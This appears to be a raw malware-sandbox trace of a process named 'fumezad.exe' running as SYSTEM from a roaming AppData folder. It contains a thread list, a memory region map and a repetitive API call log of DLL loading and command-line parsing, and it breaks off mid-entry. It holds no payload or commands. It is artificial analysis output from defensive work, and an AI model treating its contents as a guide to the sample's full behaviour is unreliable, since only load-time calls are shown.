Thread: id = 338 os_tid = 0x918 Thread: id = 339 os_tid = 0x8cc Thread: id = 340 os_tid = 0x9bc Thread: id = 341 os_tid = 0x1cc Thread: id = 342 os_tid = 0x8dc Thread: id = 343 os_tid = 0x9f8 Thread: id = 344 os_tid = 0x940 Thread: id = 345 os_tid = 0x720 Thread: id = 346 os_tid = 0x7b0 Thread: id = 347 os_tid = 0x484 Thread: id = 348 os_tid = 0x238 Thread: id = 349 os_tid = 0xa94 Thread: id = 350 os_tid = 0x470 Thread: id = 351 os_tid = 0x90 Thread: id = 352 os_tid = 0x6b0 Thread: id = 353 os_tid = 0x65c Thread: id = 354 os_tid = 0x644 Thread: id = 355 os_tid = 0x634 Thread: id = 356 os_tid = 0x21c Thread: id = 357 os_tid = 0x39c Thread: id = 358 os_tid = 0x3b8 Thread: id = 359 os_tid = 0x3b0 Thread: id = 360 os_tid = 0x3a0 Thread: id = 361 os_tid = 0x304 Thread: id = 362 os_tid = 0x300 Thread: id = 363 os_tid = 0x2ec Thread: id = 364 os_tid = 0x2d8 Thread: id = 365 os_tid = 0x2d0 Thread: id = 376 os_tid = 0xb7c Thread: id = 378 os_tid = 0x294 Thread: id = 379 os_tid = 0x580 Process: id = "37" image_name = "fumezad.exe" filename = "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe" page_root = "0x3d392000" os_pid = "0x354" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "33" os_parent_pid = "0x934" cmd_line = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d2d7" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 4669 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4670 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4671 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 4672 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 4673 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 4674 start_va = 0x190000 end_va = 0x193fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 4675 start_va = 0x1a0000 end_va = 0x1a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4676 start_va = 0x400000 end_va = 0x479fff entry_point = 0x400000 region_type = mapped_file name = "fumezad.exe" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\cleanmem\\fumezad.exe") Region: id = 4677 start_va = 0x775e0000 end_va = 0x77788fff entry_point = 0x775e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4678 start_va = 0x777c0000 end_va = 0x7793ffff entry_point = 0x777c0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4679 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 4680 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 4681 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 4682 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 4683 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 4684 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4685 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4694 start_va = 0x1f0000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 4695 start_va = 0x400000 end_va = 0x42afff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 4696 start_va = 0x750d0000 end_va = 0x7512bfff entry_point = 0x750d0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4697 start_va = 0x75240000 end_va = 0x7527efff entry_point = 0x75240000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4698 start_va = 0x752b0000 end_va = 0x752b7fff entry_point = 0x752b0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4699 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4700 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 4701 start_va = 0x430000 end_va = 0x496fff entry_point = 0x430000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4702 start_va = 0x76110000 end_va = 0x76155fff entry_point = 0x76110000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4703 start_va = 0x76540000 end_va = 0x7664ffff entry_point = 0x76540000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4704 start_va = 0x773c0000 end_va = 0x774defff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 4705 start_va = 0x774e0000 end_va = 0x775d9fff entry_point = 0x0 region_type = private name = "private_0x00000000774e0000" filename = "" Region: id = 4706 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4707 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4708 start_va = 0x75390000 end_va = 0x7542ffff entry_point = 0x75390000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 4709 start_va = 0x75c00000 end_va = 0x75cabfff entry_point = 0x75c00000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4710 start_va = 0x759f0000 end_va = 0x75a08fff entry_point = 0x759f0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 4711 start_va = 0x758f0000 end_va = 0x759dffff entry_point = 0x758f0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 4712 start_va = 0x75320000 end_va = 0x7537ffff entry_point = 0x75320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4713 start_va = 0x75310000 end_va = 0x7531bfff entry_point = 0x75310000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4714 start_va = 0x4a0000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 4715 start_va = 0x76160000 end_va = 0x762bbfff entry_point = 0x76160000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 4716 start_va = 0x755d0000 end_va = 0x7565ffff entry_point = 0x755d0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 4717 start_va = 0x76380000 end_va = 0x7647ffff entry_point = 0x76380000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 4718 start_va = 0x75510000 end_va = 0x75519fff entry_point = 0x75510000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 4719 start_va = 0x75b60000 end_va = 0x75bfcfff entry_point = 0x75b60000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 4720 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4721 start_va = 0x4a0000 end_va = 0x627fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 4722 start_va = 0x680000 end_va = 0x68ffff entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 4723 start_va = 0x20000 end_va = 0x3dfff entry_point = 0x20000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4724 start_va = 0x75cb0000 end_va = 0x75d0ffff entry_point = 0x75cb0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 4725 start_va = 0x75430000 end_va = 0x754fbfff entry_point = 0x75430000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 4726 start_va = 0x690000 end_va = 0x810fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000690000" filename = "" Region: id = 4727 start_va = 0x820000 end_va = 0x8dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 4728 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4729 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4730 start_va = 0x752d0000 end_va = 0x752dcfff entry_point = 0x752d0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 4731 start_va = 0x76770000 end_va = 0x773b9fff entry_point = 0x76770000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 4732 start_va = 0x75660000 end_va = 0x756b6fff entry_point = 0x75660000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 4734 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 4735 start_va = 0x8e0000 end_va = 0x9dffff entry_point = 0x0 region_type = private name = "private_0x00000000008e0000" filename = "" Region: id = 4736 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 4737 start_va = 0x75020000 end_va = 0x75048fff entry_point = 0x75020000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 4738 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4739 start_va = 0x75220000 end_va = 0x75236fff entry_point = 0x75220000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 4740 start_va = 0x75280000 end_va = 0x7528afff entry_point = 0x75280000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 4741 start_va = 0x9e0000 end_va = 0xcaefff entry_point = 0x9e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4742 start_va = 0x280000 end_va = 0x29dfff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 4743 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 4744 start_va = 0x10000000 end_va = 0x10006fff entry_point = 0x0 region_type = private name = "private_0x0000000010000000" filename = "" Region: id = 4745 start_va = 0x3b0000 end_va = 0x3b0fff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 4746 start_va = 0x3c0000 end_va = 0x3c0fff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 4747 start_va = 0xcb0000 end_va = 0xd1afff entry_point = 0xcb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4776 start_va = 0x3d0000 end_va = 0x3e9fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4777 start_va = 0x3d0000 end_va = 0x3d2fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4778 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4779 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 4780 start_va = 0x3d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Thread: id = 368 os_tid = 0x630 [0220.465] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76540000) returned 0x0 [0220.479] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x75390000) returned 0x0 [0220.488] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ole32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76160000) returned 0x0 [0220.499] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WTSAPI32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x752d0000) returned 0x0 [0220.508] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32.dll", BaseAddress=0x18ae0c | out: BaseAddress=0x18ae0c*=0x76770000) returned 0x0 [0220.511] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.511] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c21f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.511] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.511] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2278*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.511] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.511] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c22f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.511] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2378*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c23f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2478*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c24f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2578*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c25f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2678*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c26f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2778*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c27f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2878*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c28f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2978*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c29f8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2a78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2af8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2b78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2bf8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2c78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2cf8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2d78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2df8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2e78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2ef8*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: pNumArgs=0x42952b) returned 0x2c2f78*="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe" [0220.512] GetCommandLineW () returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe " [0220.512] CommandLineToArgvW (in: lpCmdLine="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe ", pNumArgs=0x42952b | out: 